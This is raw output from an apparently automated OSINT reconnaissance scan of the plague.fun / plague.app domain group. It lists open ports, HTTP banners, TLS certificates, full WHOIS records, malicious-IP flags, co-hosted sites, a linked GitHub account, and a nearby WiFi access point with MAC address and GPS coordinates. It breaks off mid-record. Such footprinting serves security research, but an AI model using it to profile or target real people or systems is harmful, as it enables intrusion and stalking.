u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'0', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.capslab.co', u'capslab.co'], u'cn': u'*.capslab.co', u'valid': True, u'not_after': u'2022-12-06T07:20:57Z', u'key_size': 2048, u'issuer_name': u'GTS CA 1P5', u'fingerprint': u'54ac2013bc183f7f7133acce79f37753753778f568c8041d17b1ca51fe05cf15', u'key_algo': u'RSA', u'not_before': u'2022-09-07T07:20:58Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'cpcalendars.capslab.co', u'summary': u'Date: Wed, 02 Nov 2022 23:50:42 GMT\r\nContent-Length: 0\r\nConnection: close\r\nCache-Control: no-store, no-cache\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Yq2nlCjSy9QiY40pDUMjQsSM2qIldDxaQuSZRA9Ar8aYWRzUOQPO0TntnMuPcCLIYI5EPwrfN5jncUSDLa3g08w25W7%2FVPK8JbDFOIbB9xD8jPPsl6FIpQB57De%2BcLfefPWNgxuST%2FIy"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nStrict-Transport-Security: max-age=0; includeSubDomains\r\nServer: cloudflare\r\nCF-RAY: 7640c623bb876bab-SIN\r\nalt-svc: h3=":8443"; ma=86400, h3-29=":8443"; ma=86400\r\n\n\n', u'time': u'2022-11-02T23:50:42.241381011Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'104.21.28.240', u 104.21.28.240 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b265899d032ad2-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:06:42 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.190.129:80 172.67.190.129 2022-12-18 00:02:43 SSL Certificate - Issued to No CertSpotter 1 0 1 0 None CN=atlas.plague.fun plague.fun 2022-12-18 00:18:08 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.2:80 188.114.97.0/24 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None CATYLN (Net ID: 00:01:38:86:06:1F) 37.780462,-122.390564 2022-12-18 00:29:08 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.uk plague.fun 2022-12-18 00:23:31 Raw DNS Records No DNS Raw Records 0 0 2 0 None mail.zerotwo-best-waifu.online. 900 IN CNAME mail-fr.securemail.pro. mail.zerotwo-best-waifu.online 2022-12-18 00:06:58 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.96.1] https://isc.sans.edu/api/ip/188.114.96.1 188.114.96.1 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None vc657hg.qw653bv.repl.co 34.149.204.188 2022-12-18 00:30:51 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: plague.app Registry Domain ID: 2CB67ED35-APP Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com/ Updated Date: 2021-05-10T13:06:59Z Creation Date: 2018-05-08T16:02:12Z Registry Expiry Date: 2023-05-08T16:02:12Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.101domain.com Name Server: ns2.101domain.com Name Server: ns5.101domain.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:48Z <<< For more information on Whois status codes, please visit https://icann.org/epp Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely for query-based, informational purposes. By querying our WHOIS database, you are agreeing to comply with these terms (https://www.registry.google/about/whois-disclaimer.html) and acknowledge that your information will be used in accordance with CRR's Privacy Policy (https://www.registry.google/about/privacy.html), so please read those documents carefully. Any information provided is "as is" without any guarantee of accuracy. You may not use such information to (a) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations; (b) enable high volume, automated, electronic processes that access the systems of CRR or any ICANN-Accredited Registrar, except as reasonably necessary to register domain names or modify existing registrations; or (c) engage in or support unlawful behavior. CRR reserves the right to restrict or deny your access to the Whois database, and may modify these terms at any time. Domain Name: plague.app Registry Domain ID: 2CB67ED35-APP Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2021-05-05T13:06:59Z Creation Date: 2018-05-08T16:02:12Z Registrar Registration Expiration Date: 2023-05-08T16:02:12Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR361583626 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Registry Admin ID: CR361583636 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Registry Tech ID: CR361583632 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Name Server: NS1.101DOMAIN.COM Name Server: NS2.101DOMAIN.COM Name Server: NS5.101DOMAIN.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:30:48Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad0dfe8ae622f1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:03:01 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.95 90.116.166.104 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None GitHub (Category: coding) https://github.com/rasputain rasputain 2022-12-18 00:17:08 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None 69-sparte.plague.fun plague.fun 2022-12-18 00:25:44 Affiliate - Domain Name No DNS Resolver 2 0 5 0 None dominiando.uk ns.dominiando.uk 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b0cb6b7b4e2c4c-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:05:06 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 5, u'search_terms': [{u'id': u'host', u'value': u'20.226.83.185'}], u'result': [{u'environment_id': 110, u'job_id': u'638f6278389c860b621ea62a', u'analysis_start_time': u'2022-12-06 15:40:40', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3f181648f1364a23b7f272f4e60c08615f1febfa72b78e3c8d75daeaaa6d3110', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 110, u'job_id': u'638f600a6664a264d86af3b3', u'analysis_start_time': u'2022-12-06 15:30:19', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c1c6183777a5ff13aeb0f503c548f30309a8058c37c93d6c8541614030f00fa5', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 110, u'job_id': u'638f5e1253d2ec57ca1854bd', u'analysis_start_time': u'2022-12-06 15:21:55', u'vx_family': u'Malicious site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 34, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'bdd3745faefe1c8fdb922e3671a3e342360d521a0f1fa974510813c51fb1913c', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 110, u'job_id': u'638f5c1808fc134fee52854a', u'analysis_start_time': u'2022-12-06 15:13:29', u'vx_family': u'Malicious site', u'av_detect': u'8', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 63, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 110, u'job_id': u'638f5a030d35cf1e924e752e', u'analysis_start_time': u'2022-12-06 15:04:36', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'type': None, u'type_short': u'url', u'size': 65}]} 20.226.83.185 2022-12-18 00:06:00 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None registrar-servers.com eforward1.registrar-servers.com 2022-12-18 00:04:50 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'188.114.96.1'}], u'result': [{u'environment_id': 100, u'job_id': u'631a665717ba8f2f707e8915', u'analysis_start_time': u'2022-09-08 22:02:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'type': None, u'type_short': u'url', u'size': 44}]} 188.114.96.1 2022-12-18 00:37:36 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.synology.me plague.fun 2022-12-18 00:32:27 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.tools Registry Domain ID: ecc23f6039fd437480662da9344894d6-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-02-13T11:50:45Z Creation Date: 2022-02-08T11:50:07Z Registry Expiry Date: 2023-02-08T11:50:07Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:17Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Socket not responding: timed out plague.tools 2022-12-18 00:13:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.ca Registry Domain ID: 73359129-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: https://www.namecheap.com/ Updated Date: 2022-03-24T03:14:22Z Creation Date: 2019-01-18T19:17:36Z Registry Expiry Date: 2023-01-18T19:17:36Z Registrar: Go Get Canada Domain Registrar Ltd. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: ns709.websitewelcome.com Name Server: ns710.websitewelcome.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) Domain Name: plague.ca Registry Domain ID: 73359129-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: https://www.namecheap.com/ Updated Date: 2022-03-24T03:14:22Z Creation Date: 2019-01-18T19:17:36Z Registry Expiry Date: 2023-01-18T19:17:36Z Registrar: Go Get Canada Domain Registrar Ltd. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: ns709.websitewelcome.com Name Server: ns710.websitewelcome.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a8befc7cae86aa-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:21:20 Netblock Membership No Censys 0 0 2 0 None 188.114.97.0/24 188.114.97.1 2022-12-18 00:18:04 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.0:443 188.114.97.0/24 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2083 172.67.190.129 2022-12-18 00:41:01 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.com misogyny.wtf 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None attentivewellmadeaudit.replealtan.repl.co 34.149.204.188 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b14ee8bd622cb3-ORD Content-Encoding: gzip 172.67.190.129 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 